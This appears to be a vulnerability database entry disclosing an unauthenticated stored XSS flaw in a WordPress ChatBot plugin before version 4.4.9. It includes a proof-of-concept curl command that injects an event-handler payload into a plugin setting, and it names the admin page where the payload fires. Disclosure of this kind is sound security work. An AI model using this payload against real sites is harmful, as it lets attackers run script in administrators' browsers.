Lucene search

K
wpexploitWpvulndbWPEX-ID:1A5CBCFC-FA55-433A-A76B-3881B6C4BEA2
HistoryApr 12, 2023 - 12:00 a.m.

ChatBot < 4.4.9 - Unauthenticated Stored XSS

2023-04-1200:00:00
wpvulndb
60
chatbot
unauthenticated
stored xss
vulnerability
version 4.4.9
admin
simple text response
dashboard
exploit

EPSS

0.001

Percentile

47.2%

The plugin does not have authorisation and CSRF in a function hooked to init, allowing unauthenticated users to update some settings, leading to Stored XSS due to the lack of escaping when outputting them in the admin dashboard

curl -X POST --data 'qc_bot_str_weight=" style=animation-name:rotation onanimationstart=alert(/XSS/)//' http://127.0.0.1/

The XSS will be trigged when an admin view the Simple Text response dashboard (/wp-admin/admin.php?page=simple-text-response)

EPSS

0.001

Percentile

47.2%

Related for WPEX-ID:1A5CBCFC-FA55-433A-A76B-3881B6C4BEA2